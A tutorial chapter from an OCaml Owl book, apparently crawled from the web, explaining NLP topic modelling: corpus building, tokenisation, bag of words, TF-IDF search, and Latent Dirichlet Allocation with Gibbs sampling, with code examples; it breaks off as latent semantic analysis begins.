msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:de9fbf89-c2a1-49a4-9079-c232a305fece>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bce3b61-f33d-4f76-98dd-f6fd02c05ba4>\",\"WARC-IP-Address\":\"85.166.188.140\",\"WARC-Target-URI\":\"http://jalape.no/math/tknottxt.htm\",\"WARC-Payload-Digest\":\"sha1:B7YDO7F54DLYP2ETC6EAPB5OS6Y3U36R\",\"WARC-Block-Digest\":\"sha1:LVBOTVROAX2QKJ732DZ3AIGYQBSR37S2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203168.70_warc_CC-MAIN-20190324022143-20190324044143-00316.warc.gz\"}"}
https://ocaml.xyz/book/nlp.html
[ "Back\n\n# Natural Language Processing\n\nText is a dominant media type on the Internet along with images, videos, and audios. Many of our day-to-day tasks involve text analysis. Natural language processing (NLP) is a powerful tool to extract insights from text corpora.\n\n## Introduction\n\nNLP is a field of research that helps computers understand, interpret and manipulate human language. It combines many disciplines, including linguistics, computer science, information engineering, and artificial intelligence, etc. NLP is often considered difficult in computer science, since the rules that lie behind natural languages are not always easy for computers to understand. For example, the abstract ideas such as sarcastic and humour are still difficult to convey to computers. Besides, in the real world the data that generated by conversations and tweets etc. are unstructured and cannot be fit well into the traditional row and column structure. The unstructured data are difficult to manipulate.\n\nNLP is a large topic that covers many different advanced problems. Information Retrieval focuses on recognising structured information such as key relations or event types from given unstructured information. The Named Entity Recognition task belongs to this category. Machine Translation is one of the most important fields in NLP. It involves translating text or speech from one language to another using computer programs. Currently we are still far from being able to build translation systems that can match the quality of human translation. Text generation also covers a lot of NLP tasks. The generated text can be used to explain or describe certain input, combining information from multiple sources into a summary, or for interactive conversation with human participants. Research in these fields often needs linguistic knowledge, and deep learning approaches have also achieved good performance on many NLP tasks.\n\nWe surely cannot cover all of them in this one single chapter, perhaps not even a whole book. To this end, in this chapter we mainly focus on information retrieval, and specifically, topic modelling. In this chapter, we will use a news dataset crawled from the Internet. It contains 130000 pieces of news from various sources, each line in the file representing one entry. For example we the first line/document is:\n\na brazilian man who earns a living by selling space for tattoo adverts on his body is now looking for a customer for his forehead , it appears ... borim says when clients do n't pay or cancel an ad , he crosses them out . \" skinvertising \" caused a stir in the mid-2000s , when many dot.com companies experimented with it...\n\n## Text Corpus\n\nNormally we call a collection of documents a text corpus, which contains a large and structured set of texts. For example, for the English language there are the Corpus of Contemporary American English, Georgetown University Multilayer Corpus, etc. Our news collection is also one such example. To perform NLP tasks such as topic modelling, the first and perhaps the most important thing is to represent a text corpus as format that the models can process, instead of directly using natural language.\n\nFor the task of topic modelling, we perform the tokenisation on the input English text. The target is to represent each word as an integer index so that we can further process the numbers instead of words. This is called the tokenisation of the text. 
Of course we also need a mapping function from index to word.\n\n### Step-by-step Operation\n\nThe NLP module in Owl supports building a proper text corpus from a given text dataset. In this section we will show how we can build a corpus from a collection of documents, in a step-by-step way.\n\nIn the first step, remove the special characters. We define a regular expression regexp_split for special characters such as ,, ?, \\t etc. First remove them, and then convert all the text into lower-case. The code below defines such a process function, and Nlp.Corpus.preprocess applies it to all the text. Note this function will not change the number of lines in a corpus.\n\nlet simple_process s =\nStr.split Owl_nlp_utils.regexp_split s\n|> List.filter (fun x -> String.length x > 1)\n|> String.concat \" \"\n|> String.lowercase_ascii\n|> Bytes.of_string\n\nlet preprocess input_file =\nlet output_file = input_file ^ \".output\" in\nNlp.Corpus.preprocess simple_process input_file output_file\n\nBased on the processed text corpus, we can build the vocabulary. Each word is assigned a number id, or index, and we have the dictionary to map word to index, and index to word. This is achieved by using the Nlp.Vocabulary.build function.\n\nlet build_vocabulary input_file =\nlet vocab = Nlp.Vocabulary.build input_file in\nlet output_file = input_file ^ \".vocab\" in\nNlp.Vocabulary.save vocab output_file\n\nThe build function returns a vocabulary. It contains three hash tables. The first maps a word to an index, and the second maps an index to a word. The last hash table is a map between an index and its frequency, i.e. the number of occurrences in the whole text body. We can check out the words of highest frequency with:\n\nlet print_freq vocab =\nNlp.Vocabulary.top vocab 10 |>\nOwl.Utils.Array.to_string ~sep:\", \" fst\n\nUnsurprisingly, the “the”’s and “a”’s are most frequently used:\n\n- : string =\n\"the, to, of, a, and, in, \\\", s, that, on\"\n\nChanging Nlp.Vocabulary.top to Nlp.Vocabulary.bottom can show the words of lowest frequency:\n\n\"eichorst, gcs, freeross, depoliticisation, humping, shopable, appurify, intersperse, vyaecheslav, raphaelle\"\n\nHowever, in a topic modelling task, we don’t want these overly frequent but meaningless words, and perhaps also not the least frequent words that say little about the topic of a document. Now let’s trim off some of the most and least frequent words. You can trim either by absolute number or by percent. We use percent here, namely trimming off the top and bottom 1% of the words.\n\nlet trim_vocabulary vocab =\nNlp.Vocabulary.trim_percent ~lo:0.01 ~hi:0.01 vocab\n\nWith a proper vocabulary at hand, we are now ready to tokenise a piece of text.\n\nlet tokenise vocab text =\nString.split_on_char ' ' text |>\nList.map (Nlp.Vocabulary.word2index vocab)\n\nFor example, if we tokenise “this is an owl book”, we get the following output.\n\ntokenise vocab \"this is an owl book\";;\n- : int list = [55756; 18322; 109456; 90661; 22362]\n\nFurthermore, we can now tokenise the whole news collection.\n\nlet tokenise_all vocab input_file =\nlet doc_s = Owl_utils.Stack.make () in\nOwl_io.iteri_lines_of_file\n(fun i s ->\nlet t =\nStr.split Owl_nlp_utils.regexp_split s\n|> List.filter (Owl_nlp_vocabulary.exits_w vocab)\n|> List.map (Owl_nlp_vocabulary.word2index vocab)\n|> Array.of_list\nin\nOwl_utils.Stack.push doc_s t)\ninput_file;\ndoc_s\n\nThe process is simple: in the text corpus each line is a document and we iterate through the text line by line. 
For each line/document, we remove the special characters, filter out the words that exist in the vocabulary, and map each word to an integer index accordingly. Even though this is a simplified case, it well illustrates the typical starting point of text analysis before delving into any topic modelling.\n\n### Use the Corpus Module\n\nBut we don’t have to build a text corpus step by step. We provide the NLP.Corpus module for convenience. By using the Nlp.Corpus.build we perform both tasks we have introduced: building vocabulary, and tokenising the text corpus. With this function we can also specify how to trim off the high-frequency and low-frequency words. Here is an example:\n\nlet main () =\nlet ids = Nlp.Corpus.unique \"news.txt\" \"clean.txt\" in\nPrintf.printf \"removed %i duplicates.\" (Array.length ids);\nlet corpus = Nlp.Corpus.build ~lo:0.01 ~hi:0.01 \"clean.txt\" in\nNlp.Corpus.print corpus\n\nThe Nlp.Corpus.unique function is just one more layer of pre-processing. It removes the possible duplicated lines/documents. The output prints out the processing progress, and then a summary of the corpus is printed out.\n\n2020-01-28 19:07:05.461 INFO : build up vocabulary ...\n2020-01-28 19:07:10.461 INFO : processed 13587, avg. 2717 docs/s\n2020-01-28 19:07:15.463 INFO : processed 26447, avg. 2644 docs/s\n...\n2020-01-28 19:08:09.125 INFO : convert to binary and tokenise ...\n2020-01-28 19:08:34.130 INFO : processed 52628, avg. 2104 docs/s\n2020-01-28 19:08:39.132 INFO : processed 55727, avg. 1857 docs/s\n...\ncorpus info\nfile path : news.txt\n# of docs : 129968\ndoc minlen : 10\n- : unit = ()\n\nThe corpus contains three parts: the vocabulary, token, and text string. By calling the build function, we also save them for later use. It creates several files in the current directory. First, there is the vocabulary file news.txt.voc and news.txt.voc.txt. They are the same; only that the latter is in a human-readable format that has each line a word and the corresponding index number. We can get the vocabulary with Corpus.get_vocab.\n\nThe tokenised text corpus is marshalled to the news.txt.tok file, and the string format content is saved as binary file to news.txt.bin. We choose to save the content as binary format to save file size. To get the i-th document, we can use Corpus.get corpus i to get the text string, or Corpus.get_tok corpus i to get an integer array that is tokenised version of this document.\n\nTo access different documents efficiently by the document index (line number), we keep track of the accumulated length of text corpus and token array after processing each document. These two types of indexes are saved in the news.txt.mdl file. This file also contains the document id. We have seen the minlen value in the output of corpus information. Each document with less than 10 words will not be included in the corpus. The document id is an int array that shows the index (line number) of each document in the original text corpus so that it can be traced back. The document id can be retrieved by Corpus.get_docid corpus\n\nIn the Corpus module, we provide three mechanisms to iterate through the text corpus: next, iteri, mapi. The next function is a generator that yields the next line of text document string in the text corpus until it hits the end of file. The iteri and mapi functions work exactly like in the normal Array module. The first function iterates all the documents one by one in the corpus, and the second maps all the documents in a corpus into another array. 
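As a small usage sketch (assuming the corpus value built by the main function above; the exact output is dataset-dependent), we could print the size of the first few documents or map every document to its length:\n\nlet print_first_docs corpus =\nNlp.Corpus.iteri (fun i doc ->\nif i < 3 then Printf.printf \"doc %i: %i characters; \" i (String.length doc))\ncorpus\n\nlet doc_lengths corpus =\nNlp.Corpus.mapi (fun _ doc -> String.length doc) corpus\n\n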
The iteri_tok and mapi_tok work the same, except that the function should work on integer array instead of string. Their signatures is shown below:\n\nval iteri : (int -> string -> unit) -> t -> unit\n\nval iteri_tok : (int -> int array -> unit) -> t -> unit\n\nval mapi : (int -> string -> 'a) -> t -> 'a array\n\nval mapi_tok : (int -> 'a -> 'b) -> t -> 'b array\n\nThe Corpus module is designed to support a large number of text corpus. With this tool in hand, we can further proceed with the discussion of topic modelling.\n\n## Vector Space Models\n\nBased on the tokenised text corpus, the next thing we need is a mathematical model to express abstract ideas such as “this sentence makes sense and that one does not”, “these two documents are similar”, or “the key word in that paragraph is such and such”. To perform NLP tasks such as text retrieval and topic modelling, we use the Vector Space Model (VSM) to do that.\n\nAccording to the Wikipedia, a VSM is “an algebraic model for representing text documents (and any objects, in general) as vectors of identifiers”. It may sound tricky but the basic idea is actually very simple. For example, let’s assume we only care about three topics in any news: covid19, economics, and election. Then we can represent any news article with a three-element vector, each representing the weight of this topic in it. For the BBC news “Coronavirus: Millions more to be eligible for testing”, we can represent it with vector (100, 2.5, 0). The specific value does not actually matter here. The point is that now instead of a large chunk of text corpus, we only need to deal with this vector for further processing.\n\nThe vector space model proposes a framework that maps a document to a vector $$d = (x_1, x_1, \\ldots, x_N)$$. This N-dimensional vector space is defined by $$N$$ basic terms. Under this framework, we mainly have to decide on three factors. The first is to choose the meaning of each dimension, or the $$N$$ basic concepts in the vector space. The second is to specify the weight of each dimension for a document. In our simple example, why do we assign the first weight to 100 instead of 50? There should be rules about it. That means we need a proper mapping function $$f$$ defined. Finally, after learning the vector representation, we can we can cluster or search the documents based on their similarity. Some common metrics of similarity are Euclidean distance and cosine similarity. We will talk about it later.\n\nIn this chapter we focus on mapping a document to a vector space. However, VSM is not limited to only documents. We can also map a word into a vector that represents a point in a certain vector space. This vector is also called word embedding. In a proper representation, the similar words should be cluster together, and can even be used for calculation such as:\n\n$V_\\textrm{king} - V_\\textrm{man} + V_\\textrm{women} \\approx V_\\textrm{queen}.$\n\nOne of the most widely used methods for word embedding is the word2vec proposed in (Mikolov, Le, and Sutskever 2013). It includes different algorithms such as the skip-gram for computing the vector representation of words. For general purpose use, Google has already published a pre-trained word2vec-based word embedding vector set based on part of the GoogleNews dataset. This vector set contains 300-dimensional vectors for 3 million words and phrases.\n\nNow, let’s return to the theme of mapping documents to vector space. 
In the next chapter, we will start with a simple method that instantiate the VSM: the Bag of Words.\n\n## Bag of Words (BOW)\n\nThe Bag of Words is a simple way to map docs into a vector space. This space uses all the vocabulary as the dimensions. Suppose there are totally $$N$$ different words in the vocabulary, then the vector space is of $$N$$ dimension. The mapping function is simply counting how many times each word in the vocabulary appears in a document.\n\nFor example, let’s use the five words “news”, “about”, “coronavirus”, “test”, and “cases” as the five dimensions in the vector space. Then if a document is \"...we heard news a new coronavirus vaccine is being developed which is expected to be tested about September...\" will be represented as [1, 1, 1, 1, 0] and the document \"...number of positive coronavirus cases is 100 and cumulative cases are 1000...\" will be projected to vector [0, 0, 1, 0, 2].\n\nThis Bag of Words method is easy to implement based on the text corpus. We first define a function that count the term occurrence in a document and return a hash table:\n\nlet term_count htbl doc =\nArray.iter\n(fun w ->\nmatch Hashtbl.mem htbl w with\n| true ->\nlet a = Hashtbl.find htbl w in\nHashtbl.replace htbl w (a +. 1.)\n| false -> Hashtbl.add htbl w 1.)\ndoc\n\nThe hash table contains all the counts of words in this document. Of course, we can also represent the returned results as an array of integers, though the array would likely be sparse. Then we can apply this function to all the documents in the corpus using the map function:\n\nlet build_bow corpus =\nNlp.Corpus.mapi_tok\n(fun i doc ->\nlet htbl = Hashtbl.create 128 in\nterm_count htbl doc;\nhtbl)\ncorpus\n\nBased on this bag of words, the similarity between two vectors can be measured using different methods, e.g. with a simple dot product.\n\nThis method is easy to implement and the computation is inexpensive. It may be simple, but for some tasks, especially those that have no strict requirement for context or position of words, this method proves to work well. For example, to cluster spam email, we only need to specify proper keywords as dimensions, such as “income”, “bonus”, “extra”, “cash”, “free”, “refund”, “promise” etc. We can expect that the spam email texts will be clustered closely and easy to recognise in this vector space using the bag of words.\n\nActually, one even simpler method is called Boolean model. Instead of term frequency (count of word), the table only contains 1 or 0 to indicate if a word is present in a document. This approach might also benefit from its simplicity and proved to be useful in certain tasks, but it loses the information about the importance of the word. One can easily construct a document that is close to everyone else, by putting all the vocabulary together. The bag of word method fixes this problem.\n\nOn the other hand, this simple approach does have its own problems. Back to the previous example, if we want to get how close a document is to \"news about coronavirus test cases\", then the doc \"...number of positive coronavirus cases is 100 and cumulative cases are 1000...\" is scored the same as \"hey, I got some good news about your math test result...\". This is not what we expected. Intuitively, words like “coronavirus” should matter more than the more normal words like “test” and “about”. 
That’s why we are going to introduce an improved method in the next section.\n\n## Term Frequency–Inverse Document Frequency (TF-IDF)\n\nIn this previous section, we use the count of each term in representing document as vector. It is a way to represent the frequency the term in the document, and we can call it term frequency. In the previous section we have seen the intuition that the meaning of different word should be different. This cannot be fixed by simply using term count. In this section we introduce the idea of Inverse Document Frequency (IDF) to address this problem.\n\nThe basic idea is simple. The IDF is used to represent how common a word is across all the documents. You can imagine that if a word is used throughout all the documents, then it must be of less importance in determining a feature of a document. On the other hand, if a word exists in only 1-2 documents, and where it exists, this word must be of crucial importance to determine its topic. Therefore, the IDF factor can be multiplied with the term frequency to present a more accurate metric for representing a document as vector. This approach is called TF-IDF.\n\nActually, the two parts TF and IDF just provide frameworks for different computation methods. To compute the term frequency, we can use the count of words $$c$$, or the percentage of word in the current document $$\\frac{c}{N}$$ where $$N$$ is the total number of words in the document. Another computation method is logarithm normalisation which use $$\\textrm{log}(c + 1)$$. We can even use the boolean count that take the frequency of word that exists to be 1 that the ones that are not to be 0. These methods are all defined in the Owl_nlp.Tfidf module.\n\ntype tf_typ =\n| Binary\n| Count\n| Frequency\n| Log_norm\n\nThe same goes for the IDF. To measure how common a word $$w$$ is across all the document, a common way to compute is to do: $$log(\\frac{N_D}{n_w})$$, where $$N_D$$ is the total number of documents and $$n_w$$ is the number of documents with term $$w$$ in it. This metric is within the range of $$[0, \\infty)$$. It increases with larger total document number or smaller number of documents that contain a specific word. An improved version is called Idf_Smooth. It is calculated as $$log(\\frac{N_D}{n_w + 1})$$. This method avoid the $$n_w$$ to be zero to cause divide error, and also avoid getting a 0 for a word just because it is used across all the documents. In Owl they are included in the type df_typ. Here the Unary method implies not using IDF, only term frequency.\n\ntype df_typ =\n| Unary\n| Idf\n| Idf_Smooth\n\nIn Owl we have the Owl_nlp.Tfidf module to perform the TF-IDF method. The corpus we have built in the previous section is used as input to it. Specifically, we use the Nlp.Tfidf.build function to build the TFIDF model:\n\nlet build_tfidf corpus =\nlet tf = Nlp.Tfidf.Count in\nlet df = Nlp.Tfidf.Idf in\nlet model = Nlp.Tfidf.build ~tf ~df corpus in\nNlp.Tfidf.save model \"news.tfidf\";\nmodel\n\nIn this code, we configure to use the bag-of-words style word count method to calculate term frequency, and use the normal logarithm method to compute inverse document frequency. The model can be saved for later use. After the model is build, we can search similar documents according to a given string. 
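Before that, to make the weighting itself concrete, here is a hand-rolled sketch of the Count/Idf combination configured above (toy numbers and a hypothetical helper, not the Owl implementation):\n\nlet tf_idf_weight count n_docs n_docs_with_word =\nfloat_of_int count *. log (float_of_int n_docs /. float_of_int n_docs_with_word)\n\nFor instance, a word that occurs 3 times in a document but appears in only 100 of 100000 documents gets tf_idf_weight 3 100000 100, which is about 20.7, whereas a word that appears in every document gets a weight of 0 no matter how often it occurs locally. 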
As a random example, let’s just use the first sentence in our first piece of news in the dataset as search target: \"a brazilian man who earns a living by selling space for tattoo adverts on his body is now looking for a customer for his forehead\".\n\nlet query model doc k =\nlet typ = Owl_nlp_similarity.Cosine in\nlet vec = Nlp.Tfidf.apply model doc in\nlet knn = Nlp.Tfidf.nearest ~typ model vec k in\nknn\n\nRecall the three ingredients in vector space model: choosing dimension topic words, mapping document to vector, and the measurement of similarity. Here we use the cosine similarity as a way to measure how aligned two vectors $$A$$ and $$B$$ are. We will talk about the similarity measurement in detail later.\n\nNext, the vec returned by the apply functions return an array of (int * float) tuples. For each item, the integer is the tokenised index of a word in the input document doc, and the float number is the corresponding TF-IDF value, based on the model we get from previous step. Finally, the nearest function searches all the documents and finds the vectors that have the largest similarity with the target document. Let’s show the top-10 result by setting k to 10:\n\nval knn : (int * float) array =\n[|(11473, -783.546068863270875); (87636, -669.76533603535529);\n(121966, -633.92555577720907); (57239, -554.838541799660675);\n(15810, -550.95468134048258); (15817, -550.775276912183131);\n(15815, -550.775276912183131); (83282, -547.322385552312426);\n(44647, -526.074567425088844); (0, -496.924176137374445)|]\n\nThe returned result shows the id of the matched documents. We can retrieve each document by running e.g. Owl_nlp.Corpus.get corpus 11473. To save you some effort to do that, here we list link to some of the original news that are matched to be similar to the target document:\n\n1. Every tatto tells a story, doc id: 11473. [Link]\n2. The Complete Guide to Using Social Media for Customer Service, doc id: 87636. [Link]\n3. Murder ink? Tattoos can be tricky as evidence, doc id: 57239. [Link]\n5. The profusion of temporarily Brazilian-themed products, doc id:44647. [Link]\n\nIf you are interested, the input document comes from this BBC news: Brazil: Man ‘earns a living’ from tattoo ads. Then you can see that, the searched result is actually quite related to the input document, especially the first one, which is exactly the same story written in another piece of news. The second result is somewhat distant. The word “customer” is heavily used in this document, and we can guess that it is also not frequently seen throughout the text corpus. The fourth news is not about the tattoo guy, but this news features the topic of “customer” and “adverts”. The fifth news is chosen apparently because of the non-frequent word “brazilian” carries a lot of weight in TF-IDF. The interesting thing is that the same document, the first document, is ranked only 10th closest. Note that we just simply take a random sentence without any pre-processing or keyword design; also we use the un-trimmed version of text corpus. Even so, we can still achieve a somewhat satisfactory matching result, and the result fits nicely with the working mechanisms of the TF-IDF method.\n\n## Latent Dirichlet Allocation (LDA)\n\nIn the previous section, we have seen that by specifying a document and using it as a query, we can find out the similar documents as the query. The query document itself is actually seen as a collection of words. However, the real world text, article or news, are rarely as simple as collections of words. 
More often than not, an article contains one or more topics. For example, it can involve the responsibility of government, the protection of environment, and a recent protest in the city, etc. Moreover, each of these topics can hardly be totally covered by just one single word. To this end we introduce the problem topic modelling: instead of proposing a search query to find similar content in text corpus, we hope to automatically cluster the documents according to several topics, and each topic is represented by several words.\n\nOne of such method to do topic modelling is called Latent Dirichlet Allocation (LDA). The trained model of LDA contains two matrices. The first is called the “document-topic”, which contains the number of tokens assigned to each topic in each doc. What do these topics look like then? This concerns the other trained matrix in the model: the “word-topic table”. It contains the number of tokens assigned to each topic for each word. We will see how they work in a latter example. But first, some background theory.\n\n### Models\n\nLet’s take a look at the model of LDA that is proposed in (Blei, Ng, and Jordan 2003). That is to say, how the LDA thinks about the way a document is composed. The model is expressed in fig. 1.\n\nThis model uses the plate notation, the notation for describing probabilistic graphical models, to capture the dependencies among variables. In tbl. 1 we list the definition of the math notations used here and latter in this section.\n\nTable 1: Variable notations in the LDA model\nVariable Meaning\n$$K$$ number of topics\n$$D$$ number of documents in text corpus\n$$V$$ number of words in the vocabulary\n$$N$$ total number or words in all document\n$$\\alpha$$ vector of length $$K$$, prior weight of the $$K$$ topics in a document\n$$\\beta$$ vector of length $$V$$, prior weight of the $$V$$ words in a topic\n$$\\Theta$$ vector of length $$K$$, distribution of topics in a document\n$$\\phi$$ vector of length $$V$$, distribution of words in a topic\n$$Z$$ matrix of shape $$D\\times~V$$, topic assignment of all words in all documents\n$$W$$ matrix of shape $$D\\times~V$$, token of words in all documents\n$$n_{d,k}$$ how many times the document $$d$$ uses topic $$k$$ in the document-topic table\n$$m_{k,w}$$ the number of times topic $$k$$ uses word $$w$$ in the topic-word table\n\nIn this model, to infer the topics in a corpus, we imagine a generative process to create a document. The core idea here is that each document can be described by the distribution of topics, and each topic can be described by distribution of words. This makes sense, since we don’t need the text in order to find the topics in an article. The process is as follows:\n\n1. Initialise the distribution of topics $$\\theta_d \\sim \\textrm{Dirichlet}(\\alpha)$$ in document $$d$$. $$\\textrm{Dirichlet}(\\alpha)$$ is a Dirichlet distribution parameterised by $$\\alpha$$. We will talk about it in detail later.\n2. Initialise the distribution of words $$\\phi_k \\sim \\textrm{Dirichlet}(\\beta)$$ for topic $$k$$.\n3. Iterate each document $$d$$ and each word position $$w$$, and then perform the steps below:\n• first, picks one of these topics randomly (one of the elements in $$Z$$). Specifically, the choice of topic is actually taken according to a categorical distribution, parameterised by $$\\theta$$. 
Formally, this step is represented as $$Z_{d,w} \\sim \\textrm{Categorical}(\\theta_d)$$;\n• second, according to the words this topic contains, we pick a word randomly according to $$\\phi$$. The picking process also follows categorical distribution: $$W_{d,w} \\sim \\textrm{Categorical}(\\phi_{Z_{d,w}})$$.\n\nAfter finishing this generative process, we now have a “fake” document. The total probability of the model is:\n\n$P(W, Z, \\theta, \\phi; \\alpha, \\beta) = \\prod_{i=1}^K~P(\\phi_i; \\beta)~\\prod_{j=1}^D~P(\\theta_j; \\alpha)~\\prod_{t=1}^N~P(Z_{j,t}| \\theta_j)~P(W_{j,t}| \\phi_{Z_{j,t}}).\\qquad(1)$\n\nThe eq. 1 corresponds to the above process and model in fig. 1 step by step. It is a multiplication of three parts: the probability of $$\\theta$$ across all the documents, the probability of $$\\phi$$ across all the topics, and that of the generated words across all documents. The LDA hopes to make this generated document to be close to a real document as much as possible. In another word, when we are looking at real document, LDA tries to maximise the possibility eq. 1 that this document can be generated from a set of topics.\n\n### Dirichlet Distribution\n\nThere is something we need to add to the generative process in the previous section. How $$theta$$ and $$phi$$ are generated? Randomly? No, that would not be a proper way. Think about what would happen if we randomly initialise the document-topic table: each document will be equally likely to contain any topic. But that’s rarely the case. An article cannot talk about all the topics at the same time. What we really hope however, is that a single document belongs to a single topic, which is a more real-world scenario. The same goes for the word-topic table.\n\nTo that end, LDA uses the Dirichlet Distribution to perform this task. It is a family of continuous multivariate probability distribution parameterised by a vector $$\\alpha$$. For example, suppose we have only two topics in the whole world. The tuple (0, 1) means it’s totally about one topic, and (1,0) means its totally about the other. We can run the Stats.dirichlet_rvs function to generate such a pair of float numbers. The results are shown in fig. 2. Both figures have the same number of dots. It shows that with smaller $$\\alpha$$ value, the distribution is pushed to the corners, where it is obviously about one topic or the other. A larger $$\\alpha$$ value, however, makes the topic concentrate around the middle where it’s a mixture of both topics.\n\nTherefore, in the model in fig. 1, we have two parameters $$\\alpha$$ and $$\\beta$$ as prior weights to initialise $$\\Theta$$ and $$\\phi$$ respectively. We use reasonably small parameters to have skewed probability distributions where only a small set of topics or words have high probability.\n\n### Gibbs Sampling\n\nNext, we will briefly introduce how the training algorithm works to get the topics using LDA. The basic idea is that we go through the documents one by one. Each word is initially assigned a random topic from the Dirichlet distribution. After that, we iterate over all the documents again and again. In each iterate, we look at each word, and try to find a hopefully a bit more proper topic for this word. In this process, we assume that all the other topic assignments in the whole text corpus are correct except for the current word we are looking at. Then we move forward to the next word in this document. In one iteration, we process all the words in all the documents in the same way. 
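The per-word update can be sketched as follows (a simplified stand-alone sketch, not the actual Owl_nlp.Lda implementation: it assumes symmetric priors alpha and beta, hypothetical count arrays dk for document-topic counts, wk for topic-word counts and zk for per-topic totals, and that the counts of the word currently being resampled have already been removed):\n\nlet sample_topic ~alpha ~beta ~n_vocab dk wk zk d w =\nlet n_topics = Array.length zk in\nlet p = Array.make n_topics 0. in\nlet sum = ref 0. in\nfor k = 0 to n_topics - 1 do\n(* how much document d likes topic k; the denominator of this factor is constant in k, so it can be dropped when sampling *)\nlet doc_part = float_of_int dk.(d).(k) +. alpha in\n(* how much topic k likes word w, normalised by the size of the topic *)\nlet word_part =\n(float_of_int wk.(k).(w) +. beta)\n/. (float_of_int zk.(k) +. (beta *. float_of_int n_vocab))\nin\np.(k) <- doc_part *. word_part;\nsum := !sum +. p.(k)\ndone;\n(* draw a topic index from the unnormalised distribution p *)\nlet r = Random.float !sum in\nlet acc = ref 0. in\nlet chosen = ref (n_topics - 1) in\n(try\nfor k = 0 to n_topics - 1 do\nacc := !acc +. p.(k);\nif r <= !acc then (chosen := k; raise Exit)\ndone\nwith Exit -> ());\n!chosen\n\nIterating this update over every token of every document is exactly the sweep described above. 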
After enough iterations, we can get a fairly accurate topic assignment for each word. And then of course the topics of each document would be clear.\n\nWe need to further explain some details in this general description. The most important question is, in the sampling of a document, how exactly do we update the topic assignment of a word? We use the Gibbs Sampling algorithm to approximate the distribution of $$P(Z | W; \\alpha, \\beta)$$. For this word, we expect to get a vector of length $$k$$ where $$k$$ is the number of topics. It represents the conditional probability distribution of the topic assignment of a single word, conditioned on the rest of the model. Based on eq. 1, it can be derived that, in this distribution vector, the k-th element is:\n\n$p(Z_{d,n}=k | Z_{-d,n}, W, \\alpha, \\beta) = \\frac{n_{d,k} + \\alpha_k}{\\sum_{i=1}^K~(n_{d,i} + \\alpha_i)}~\\frac{m_{k,w_{d,n}} + \\beta_{w_{d,n}}}{\\sum_i~m_{k, i} + \\beta_i}.$\n\nHere $$w_{d,n}$$ is the current word we are looking at. To perform the sampling, we assume that only the current topic assignment to $$w_{d,n}$$ is wrong, so we remove the current assignment from the model before this round of iteration begins. $$Z$$ is the topic assignment of all words in all documents, and $$W$$ is the text corpus.\n\nThis computation is a multiplication of two parts. As shown in tbl. 1, in the first part, $$n_{d,k}$$ shows how many times the document $$d$$ uses topic $$k$$, and $$\\alpha_k$$ is the prior weight of topic $$k$$ in a document. Therefore, this item is essentially the percentage of words in the current document that are assigned topic $$k$$. To put it more simply, it shows how much this document likes topic $$k$$. The larger it is, the more likely we will assign the current word to topic $$k$$ again. The second part, in contrast, is the proportion of all tokens assigned to topic $$k$$ across the corpus that are the word $$w$$. Therefore, this item indicates how much topic $$k$$ likes the word $$w$$. A larger number means $$w$$ is more likely to be assigned to topic $$k$$ again.\n\nFinally, we multiply these two items to get the probability distribution for the topic of the word $$w_{d,n}$$, in the form of a vector of length $$K$$. Then we can draw a topic from this distribution. We iterate this sampling process again and again until the model is good enough.\n\n### Topic Modelling Example\n\nOwl contains the Owl_nlp.Lda module to perform the LDA method. Let’s first use an example to demonstrate how LDA works.\n\nlet build_lda corpus topics =\nlet model = Nlp.Lda.init ~iter:1000 topics corpus in\nNlp.Lda.(train SimpleLDA model);\nmodel\n\nThe input to LDA is still the text corpus we have built. We also need to specify how many topics we want the text corpus to be divided into. Let’s say we set the number of topics to 8. The process is simple: we first initialise the model using the init function and then we can train the model. Let’s take a look at the document-topic table in this model, as shown below.\n\nval dk : Arr.arr =\nC0 C1 C2 C3 C4 C5 C6 C7\nR0 13 13 4 7 11 12 14 16\nR1 35 196 15 42 31 23 122 4\nR2 7 9 3 1 3 163 2 4\nR3 10 22 23 140 18 11 17 143\n...\n\nThis matrix shows the distribution of topics in each document, represented by a row. Each column represents a topic. For example, you can see that the sixth column (C5) in the third document (R2) is obviously larger than the others. It means that this document dominantly talks about topic 6. 
Similarly, in the fourth document, the topic 4 and topic 8 are of equal coverage.\n\nWe can then check the topic-word table in this model:\n\nval wk : Arr.arr =\nC0 C1 C2 C3 C4 C5 C6 C7\nR0 1 0 0 0 0 0 0 0\nR1 0 0 0 1 0 0 0 0\nR2 0 0 0 0 3 0 0 0\nR3 0 0 0 0 0 0 0 3\n...\n\nThis is sparse matrix. Each row represents a word from the vocabulary. A topic in a column can thus be represented as the words that have the largest numbers in that column. For example, we can set that a topic be represented by 10 words. The translation from the word-topic table to text representation is straightforward:\n\nlet get_topics vocab wt =\nMat.map_cols (fun col ->\nMat.top col 10\n|> Array.map (fun ws ->\nOwl_nlp.Vocabulary.index2word vocab ws.(0))\n) wt\n\nAs an example, we can take a look at the topics generated by the “A Million News Headlines” dataset.\n\nTopic 1: police child calls day court says abuse dead change market\nTopic 2: council court coast murder gold government face says national police\nTopic 3: man charged police nsw sydney home road hit crash guilty\nTopic 4: says wa death sa abc australian report open sex final\nTopic 5: new qld election ban country future trial end industry hour\nTopic 6: interview australia world cup china south accused pm hill work\nTopic 7: police health govt hospital plan boost car minister school house\nTopic 8: new water killed high attack public farmers funding police urged\n\nHere each topic is represented by ten of its highest ranked words in the vocabulary, but you might “feel” a common theme by connecting these dots together, even though some words may stride away a bit far away from this theme. We cannot directly observe the topic, only documents and words. Therefore the topics are latent. The word-topic matrix shows that each word has different weight in the topic and the words in a topic are ranked according to the weight. Now that we know what each topic talks about, we can cluster the documents by their most prominent topic, or just discover what topics are covered in a document, with about how much percentage each.\n\nWe have introduced the basic mechanism of LDA. There are many work that extend based on it, such as the SparseLDA in (Yao, Mimno, and McCallum 2009), and LightLDA in (Yuan et al. 2015). They may differ in details but share similar basic theory.\n\n## Latent Semantic Analysis (LSA)\n\nBesides LDA, another common technique in performing topic modelling is the Latent Semantic Analysis (LSA). Its purpose is the same as LDA, which is to get two matrices: the document-topic table, and the word-topic table to show the probability distribution of topics in documents and words in topics. The difference is that, instead of using an iterative update approach, LSA explicitly builds the document-word matrix and then performs the singular value decomposition (SVD) on it to get the two aforementioned matrices.\n\nAssume the text corpus contains $$n$$ documents, and the vocabulary contains $$m$$ words, then the document-word matrix is of size $$n\\times~m$$. We can use the simple word count as the element in this matrix. But as we have discussed in previous section, the count of words does not reflect the significance of a word, so a 